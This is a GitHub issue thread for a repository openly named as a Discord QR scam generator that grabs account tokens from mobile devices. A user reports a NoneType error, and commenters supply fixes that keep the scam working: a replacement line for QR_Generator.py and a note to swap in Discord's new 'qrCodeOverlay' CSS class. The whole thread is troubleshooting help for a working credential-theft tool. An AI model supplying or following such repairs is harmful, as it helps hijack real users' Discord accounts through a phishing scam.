NightfallGT / Discord-QR-Scam

Discord QR Scam Code Generator + Token grab mobile device
258 stars 101 forks source link

NoneType doesnt find attribute "find" #21

Open TheDame opened 2 years ago

TheDame commented 2 years ago

I tried it but then i got an error message.

Screenshot (427)

ghost commented 2 years ago

Open "QR_Generator.py" and replace line 42 with the following: qr_code = soup.find('img')['src']

SpaceGT commented 2 years ago

I've updated my Fork to fix this

ghost commented 2 years ago

qrCodeOverlay-2bLtKl in line 41 you change the prevoius class with the one above, discord has changed it so the code still searches for the prevoius one.